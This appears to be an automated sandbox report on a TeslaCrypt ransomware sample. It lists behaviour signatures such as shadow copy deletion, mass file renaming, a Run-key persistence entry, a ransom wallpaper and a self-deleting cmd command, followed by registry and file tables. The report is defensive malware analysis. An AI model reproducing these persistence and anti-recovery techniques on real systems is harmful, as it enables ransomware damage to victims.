Analysis Overview
SHA256: 3b246faa7e4b2a8550aa619f4da893db83721aacf62b46e5863644a5249aa87e
Threat Level: Known bad
The file Ransomware.TeslaCrypt.zip was found to be: Known bad.
Malicious Activity Summary
Renames multiple (6004) files with added filename extension
Renames multiple (735) files with added filename extension
Deletes shadow copies
Renames multiple (374) files with added filename extension
Renames multiple (359) files with added filename extension
Renames multiple (4011) files with added filename extension
Drops file in Drivers directory
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Deletes itself
Reads user/profile data of web browsers
Enumerates connected drives
Adds Run key to start application
Looks up external IP address via web service
Indicator Removal: File Deletion
Drops file in System32 directory
Sets desktop wallpaper using registry
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Unsigned PE
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Uses Volume Shadow Copy service COM API
Interacts with shadow copies
Suspicious use of SetWindowsHookEx
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Checks processor information in registry
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Modifies Control Panel
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Analysis: static1
Detonation Overview
Reported: 2024-11-14 05:42
Signatures
Unsigned PE
Analysis: behavioral2
Detonation Overview
Submitted: 2024-11-14 05:42
Reported: 2024-11-14 05:44
Platform: win10ltsc2021-20241023-en
Max time kernel: 82s
Max time network: 88s
Signatures
Renames multiple (6004) files with added filename extension
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\drivers\gmreadme.txt | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\crypto13 = "C:\\Users\\Admin\\AppData\\Roaming\\hugufdp.exe" | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
Indicator Removal: File Deletion
Drops file in System32 directory
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\HELP_TO_DECRYPT_YOUR_FILES.bmp" | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.3636_none_3473be4cdeacc98a\console.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.423_none_9de80b9d881a1ebd\addXHRBreakpoint.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.19041.4355_none_70ae1507b206e5a7\f\splashscreen.contrast-white_scale-100.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\VisualProfiler\js\CpuUsage\Grid.css | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1266_none_777e4c5802d14c18\unifiedEnrollmentProvisioningProgressPage.js | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.423_none_9de80b9d881a1ebd\StateMachine.js | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Assets\Square44x44Logo.targetsize-64.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SystemResources\Windows.UI.Shell\Images\RequestedDownloadsLargeCloudIcon.scale-150.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-c..er.appxmain.ratings_31bf3856ad364e35_10.0.19041.1_none_ff46bbc9afee54c5\RatingStars38.contrast-black_scale-200.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\wow64_microsoft-windows-s..tore-main.resources_31bf3856ad364e35_10.0.19041.4529_nb-no_ba31a636ad7073a3.manifest | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-a..g-whatsnew.appxmain_31bf3856ad364e35_10.0.19041.4355_none_ee89351905ec7ddf\f\newforyoubadgelogo.scale-100_contrast-black.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-l..fessional.resources_31bf3856ad364e35_10.0.19041.4529_ar-sa_7f51b48ac5d79fc0\f\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\wow64_windowssearchengine_31bf3856ad364e35_7.0.19041.4355_none_f69176c636ff34b8\f\search.protocolhandler.mapi2.dll | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.3636_none_3473be4cdeacc98a\htmlMode.js | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-ui-shellcommon-core_31bf3856ad364e35_10.0.19041.1_none_91b1f58702057373\CellularToast.scale-125_contrast-white.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-edp-task_31bf3856ad364e35_10.0.19041.1023_none_67d9ae9ccb89c9b7\@bitlockertoastimage.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.19041.4474_none_08f8dfcf0c193741\NarratorUWPSquare44x44Logo.targetsize-60_contrast-black.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\DiagTrack\Settings\utc.tracing.json | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-l..fessional.resources_31bf3856ad364e35_10.0.19041.4529_th-th_9e177be6c44cece3\f\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-i..edia-base.resources_31bf3856ad364e35_10.0.19041.3636_ro-ro_5cab57ff22d2bb12\f\vofflps.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.19041.4474_none_fb628aaf7e87b8df\n\cbs\screenclipping\assets\storelogo.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.4474_none_7769e00c02e06184\r\ssprerror-page.js | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\wow64_microsoft.powershell.archive.resources_31bf3856ad364e35_10.0.19041.1_en-us_c64fb0a26d1f3fed\ArchiveResources.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.4474_none_7769e00c02e06184\f\discovery.js | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\cache\Local\Desktop\17.js | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1266_none_777e4c5802d14c18\settings-desktop.css | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-l..essionaln.resources_31bf3856ad364e35_10.0.19041.4529_lv-lv_6a52eae10ae28d05\f\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-l..terprises.resources_31bf3856ad364e35_10.0.19041.4529_tr-tr_05a82ecb196d30f1\f\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.3636_none_3473be4cdeacc98a\f\snapshottileview.css | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Assets\Square150x150Logo.scale-125.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-l..terprises.resources_31bf3856ad364e35_10.0.19041.1_it-it_039386304bc8adc1\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.4474_none_7769e00c02e06184\f\localngc.js | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.4474_none_7769e00c02e06184\f\provisionedapplications.svg | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\Desktop\WallpaperStyle = "0" | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe
"C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe"
C:\Users\Admin\AppData\Roaming\hugufdp.exe
C:\Users\Admin\AppData\Roaming\hugufdp.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\3372C1~1.EXE >> NUL
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffc499546f8,0x7ffc49954708,0x7ffc49954718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffc499546f8,0x7ffc49954708,0x7ffc49954718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffc499546f8,0x7ffc49954708,0x7ffc49954718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffc499546f8,0x7ffc49954708,0x7ffc49954718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
